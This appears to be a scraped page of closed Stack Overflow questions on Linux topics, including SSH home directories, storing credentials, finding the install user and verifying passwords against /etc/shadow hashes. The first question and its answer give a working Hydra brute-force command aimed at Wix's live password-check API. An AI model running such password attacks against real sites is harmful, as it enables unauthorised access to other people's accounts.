Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 11 months ago.
Improve this question
I am trying to write a linux command to get into a Wix website I have created and put a password on. I have created the webpage to specifically show my students how easy it is for a hacker to crack a simple password, and hence the importance of strong passwords.
The website I have put the simple password on is https://missyjezabel.wixsite.com/my-site
I have written the following command to crack the password. Unfortunately, although it runs, it does not give the correct password.
hydra -l '' -P password.txt missyjezabel.wixsite.com http-post-form "/my-site:value=^PASS^:Please enter the correct password." -V
Any ideas of how to get it to work?
hydra -l '' -S -V -I -P password.txt site-pages.wix.com http-post-form"/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3:{\"password\"\:\"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\:\"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\:\"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}:S=\"success\"\:true:H=Origin\:https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\:application/json"
The site reaches out to an API endpoint that uses a different address to verify that the password matches with the given site-id:
site-pages.wix.com/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3
Target that site with correct JSON params:
{\"password\"\: \"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\: \"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\: \"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}
If the password is correct the response contains a "success":true json field.
S=\"success\"\:true
And some necessary headers to include in the requests:
H=Origin\: https\://missyjezabel.wixsite.com:H=Accept\:
*/*:H=Content-Type\: application/json
As of a dictionary attack, the password.txt must contain the valid password otherwise it will fail. For the given scenario I would recommend a short manually created list.
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 7 months ago.
Improve this question
I have registered some linux machines intro AD with sssd and it works great, but I have an issue with the bash prompt. Some AD usernames start with $ and the prompt refuses to display it, so now I'm left with the string similar to #servername:~$
If I do an export PS1="\$USER#\H" it gets displayed correctly.
Any ideas on how to make bash prompt either escape the special character, or make sssd edit the bashrc with the "correct" format?
This is more of a Linux configuration question and would work better in unix.stackexchange.com or askubuntu, but generally to change default user configuration you'd want to edit the files in /etc/skel.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 3 years ago.
Improve this question
Is one of the following considered more standard than the others when storing credentials?
export DB_USER='aodhfoi2'
export DB_USER = aodhfoi2
export DB_USER="aodhfoi2"
Or, something else? Basically I'm looking to standardize various credentials and I haven't found a consistent example in what I've seen in various places on Google so was wondering if someone could recommend the best way to go about this.
I don't think there's a standard way. It is anyway considered a good practice to keep the passwords in reserved separate files from the main script. E.g.:
# .secretfile mode 600 (only root can read/write the file)
export pass=fweios
echo "Use $pass"
Then in the main script you can source the .secretfile and unset the variable when finished using it.
# mainscript
. .secretfile
# use $pass
unset pass
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 8 years ago.
Improve this question
No, it is not a duplicate of that, because I want to assign one directory to one (or more) user, when they log in throught SSH.
For example, according to user's loggin :
userFoo => I want him to arrive /somewhere/here/ after SSH login
userBar => I want him to arrive /somewhere/here/ after SSH login
userOof => I want him to arrive /anywhere/ after SSH login
And so on.
How can I do that ?
(They are connection with PuTTY and I can't force them to connect with additionnal data like ssh -t user#server 'cd /home/some/dir ; exec "$SHELL"'
Change the home directories of your users, as that's the place where they land after connecting.
The second to last entry in /etc/passwd holds this information, and can be edited for example from
userFoo:x:1000:1000:,,,:/home/userFoo:/bin/bash
to
userFoo:x:1000:1000:,,,:/somewhere/here:/bin/bash
When you log in a remote machine via SSH, it starts a shell, in most cases it's bash. It has a script, which executes every time it starts, can be found at ~/.bashrc. You may edit them, append a cd /somewhere to them.
Anyway, it's probably not a good idea, it's better to link appropiate folders to the users:
ln -s /somewhere/here ~/userFoo/comehere
ln -s /somewhere/here ~/user/comehere
ln -s /anywhere ~/userOof/comehere
So, you may just tell the users "please perform a cd comehere after you log in", it will drop them to the specified folders.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
I am looking for some code to get the linux username.. I have come across code to get current username but what I need to get is the username that was used when installing linux..
For example, if im logged in as root user, how can i get the initial username that was used when installing ubuntu?
Better still, Is there a variable that I can put in my script that will search & store install username..
you can use fact, that default uid and gid for first created user is 1000:
grep 1000:1000: /etc/passwd|cut -f1 -d':'
but keep in mind:
when default user was deleted, you get empty string
if it running on non standard configuration, uid, and gid may be different
this is not good practise (see next point)
you ate not considering multi-seat configurations, when station have many users, you should provide user config file, where user can put usernames he wants to processed or do it from command line
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
Improve this question
So my question is straight forward given a linux username and a password how can I test if it is a valid account?
You can validate that a given password is correct for a given username using the shadow file.
On most modern distributions, the hashed passwords are stored in the shadow file /etc/shadow (which is only readable by root). As root, pull the line from the shadow file for the given user like so:
cat /etc/shadow | grep username
You will see something like this:
username:$1$TrOIigLp$PUHL00kS5UY3CMVaiC0/g0:15020:0:99999:7:::
After the username there is $1. This indicates that it is an MD5 hash. After that there is another $, then (in this case) TrOIigLp followed by another $. TrOIigLp is the salt. After that is the hashed password, which was hashed using the salt - in this case PUHL00kS5UY3CMVaiC0/g0.
Now, you can use openssl to hash the given password using the same salt, like so:
openssl passwd -1 -salt TrOIigLp
Enter the given password when prompted, the openssl command should compute the MD5 hash using the salt provided, and it should be exactly the same as the above from the shadow file. The -1 in the above command is for MD5 hashing.
If you are concerned about security (which you should be), the accepted answer represents a security risk by leaving the plaintext password in the ~/.bash_history file. With this in mind, it would be better to try logging in, or perhaps removing this entry from the ~/.bash_history.